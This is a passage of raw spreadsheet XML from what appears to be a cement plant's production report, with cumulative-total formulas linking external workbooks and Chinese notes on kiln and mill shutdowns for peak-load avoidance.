        <v>4585.689</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>40021.339</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]17'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]17'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]17'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]17'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]17'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]17'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]17'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]17'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]17'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'16'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'16'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]17'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-22:10避峰停机；2#磨：8:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：10:00-24:00避峰停机。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G57+'16'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'16'!K57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G58+'16'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'16'!K58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G59+'16'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'16'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]17'!$Q$65</f>
        <v>窑:正常。A组磨：12:55-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。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G60+'16'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'16'!K60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'[14]17'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]17'!$E$6</f>
        <v>3888</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'16'!H61</f>
        <v>61904</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1177777</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]17'!$E$21</f>
        <v>3566.79</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'16'!K61</f>
        <v>65999.98</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1167160.06</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]17'!$H$6</f>
        <v>33673.1899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.7561346153844</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'[14]17'!$M$11+'[14]17'!$M$12+'[14]17'!$M$13+'[14]17'!$M$14+'[14]17'!$M$15+'[14]17'!$M$16+'[14]17'!$M$17+'[14]17'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]17'!$N$11+'[14]17'!$N$12+'[14]17'!$N$13+'[14]17'!$N$14+'[14]17'!$N$15+'[14]17'!$N$16+'[14]17'!$N$17+'[14]17'!$N$18</f>
        <v>4623</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'16'!H62</f>
        <v>47570</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>883563.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]17'!$Q$11+'[14]17'!$Q$12+'[14]17'!$Q$13+'[14]17'!$Q$14+'[14]17'!$Q$15+'[14]17'!$Q$16+'[14]17'!$Q$17+'[14]17'!$Q$18</f>
        <v>2722</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'16'!K62</f>
        <v>44571</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>879043.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]17'!$T$11+'[14]17'!$T$12+'[14]17'!$T$13+'[14]17'!$T$14+'[14]17'!$T$15+'[14]17'!$T$16+'[14]17'!$T$17+'[14]17'!$T$18</f>
        <v>21453.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>85.8145359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]17'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]17'!$M$19+'[14]17'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]17'!$N$19+'[14]17'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'16'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]17'!$Q$19+'[14]17'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'16'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]17'!$T$19+'[14]17'!$T$20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G64+'16'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'16'!K64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G65+'16'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'16'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]17'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:正常。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。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G66+'16'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'16'!K66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G67+'16'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'16'!K67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'[15]17'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]17'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'16'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]17'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'16'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]17'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]17'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨14:30-22:15避峰停机:7.75小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]17'!$D$43+'[15]17'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]17'!$E$43+'[15]17'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'16'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]17'!$H$43+'[15]17'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'16'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]17'!$K$43+'[15]17'!$K$44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'[15]17'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]17'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'16'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]17'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'16'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]17'!$K$45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G71+'16'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'16'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]17'!$Q$80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G72+'16'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'16'!K72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G73+'16'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'16'!K73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G74+'16'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'16'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]17'!$Q$83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G75+'16'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'16'!K75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G76+'16'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'16'!K76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G77+'16'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'16'!K77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G78+'16'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'16'!K78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'[16]17'!$E$7</f>
        <v>711.58</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'16'!H79</f>
        <v>8799.26</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>155927.73</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]17'!$I$7</f>
        <v>532.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'16'!K79</f>
        <v>8599</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>150490.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]17'!$L$7</f>
        <v>5085.04</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>10.17008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'[16]17'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'16'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]17'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'16'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]17'!$Y$15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G81+'16'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'16'!K81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G82+'16'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'16'!K82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G83+'16'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'16'!K83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G84+'16'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'16'!K84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G85+'16'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'16'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="H35" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="Z38" sqref="Z38"/>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18/31</f>
        <v>0.580645161290323</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46009</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22449.8</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'17'!H5</f>
        <v>377759.87</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6532625.9</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>26054.261</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'17'!K5</f>
        <v>415065.192</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6565136.323</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>230162.502</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>61.5407759358288</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]18'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]18'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]18'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]18'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]18'!$U$101</f>
        <v>53.4645833333333</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]18'!$V$101</f>
        <v>64.0895596590909</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]18'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]18'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]18'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]18'!$D$23+'[11]18'!$D$17+'[12]18'!$D$17+'[13]18'!$D$25+'[14]18'!$D$8+'[14]18'!$D$15+'[15]18'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]18'!$E$23+'[11]18'!$E$17+'[12]18'!$E$17+'[13]18'!$E$25+'[14]18'!$E$8+'[14]18'!$E$15+'[15]18'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'17'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]18'!$I$23+'[11]18'!$I$17+'[12]18'!$I$17+'[13]18'!$I$25+'[14]18'!$E$23+'[14]18'!$E$30+'[15]18'!$H$7</f>
        <v>361.65</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'17'!K6</f>
        <v>12528.97</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>274726.67</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]18'!$L$23+'[11]18'!$L$17+'[12]18'!$L$17+'[13]18'!$L$25+'[14]18'!$H$23+'[14]18'!$H$30+'[15]18'!$K$7</f>
        <v>25011.87</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]18'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]18'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]18'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]18'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]18'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]18'!$V$102</f>
        <v>33.6789654356061</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]18'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]18'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]18'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]18'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]18'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'17'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]18'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'17'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]18'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]18'!$W$107</f>
        <v>134.791454730417</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]18'!$X$107</f>
        <v>126.582278481013</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]18'!$Y$107</f>
        <v>131.536076788935</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]18'!$T$107</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]18'!$U$107</f>
        <v>45.900462962963</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]18'!$V$107</f>
        <v>31.7675189393939</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]18'!$Q$107</f>
        <v>9.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]18'!$R$107</f>
        <v>198.29</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]18'!$S$107</f>
        <v>2683.72</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]18'!$D$27+'[11]18'!$D$18+'[13]18'!$D$26+'[14]18'!$D$10+'[14]18'!$D$17+'[15]18'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]18'!$E$27+'[11]18'!$E$18+'[13]18'!$E$26+'[14]18'!$E$10+'[14]18'!$E$17+'[15]18'!$E$9</f>
        <v>2375</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'17'!H8</f>
        <v>42105</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>567641.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]18'!$I$27+'[11]18'!$I$18+'[13]18'!$I$26+'[14]18'!$E$25+'[14]18'!$E$32+'[15]18'!$H$9</f>
        <v>3253.26</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'17'!K8</f>
        <v>45517.36</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>553262.07</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]18'!$L$27+'[11]18'!$L$18+'[13]18'!$L$26+'[14]18'!$H$25+'[14]18'!$H$32+'[15]18'!$K$9</f>
        <v>38467.54</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]18'!$W$108</f>
        <v>143.54018311292</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]18'!$X$108</f>
        <v>132.454834226722</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]18'!$Y$108</f>
        <v>127.846876785096</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]18'!$T$108</f>
        <v>40.9583333333333</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]18'!$U$108</f>
        <v>46.6388888888889</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]18'!$V$108</f>
        <v>28.3893229166666</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]18'!$Q$108</f>
        <v>9.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]18'!$R$108</f>
        <v>201.48</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]18'!$S$108</f>
        <v>2398.33</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]18'!$D$24+'[11]18'!$D$19+'[12]18'!$D$20+'[13]18'!$D$27+'[14]18'!$D$11+'[14]18'!$D$18+'[15]18'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]18'!$E$24+'[11]18'!$E$19+'[12]18'!$E$20+'[13]18'!$E$27+'[14]18'!$E$11+'[14]18'!$E$18+'[15]18'!$E$10</f>
        <v>18019</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'17'!H9</f>
        <v>268174</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4403562.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]18'!$I$24+'[11]18'!$I$19+'[12]18'!$I$20+'[13]18'!$I$27+'[14]18'!$E$26+'[14]18'!$E$33+'[15]18'!$H$10</f>
        <v>18027.401</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'17'!K9</f>
        <v>279883.902</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4377362.713</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]18'!$L$24+'[11]18'!$L$19+'[12]18'!$L$20+'[13]18'!$L$27+'[14]18'!$H$26+'[14]18'!$H$33+'[15]18'!$K$10</f>
        <v>99155.81</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]18'!$W$109</f>
        <v>261.4539306847</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]18'!$X$109</f>
        <v>275.399664209066</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]18'!$Y$109</f>
        <v>271.503931691549</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]18'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]18'!$U$109</f>
        <v>31.7106481481482</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]18'!$V$109</f>
        <v>34.7133049242424</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]18'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]18'!$R$109</f>
        <v>136.99</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]18'!$S$109</f>
        <v>2932.57999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]18'!$D$25+'[11]18'!$D$20+'[12]18'!$D$21+'[13]18'!$D$28+'[14]18'!$D$12+'[14]18'!$D$19+'[15]18'!$D$11</f>
        <v>61206.942</v>
      </c>
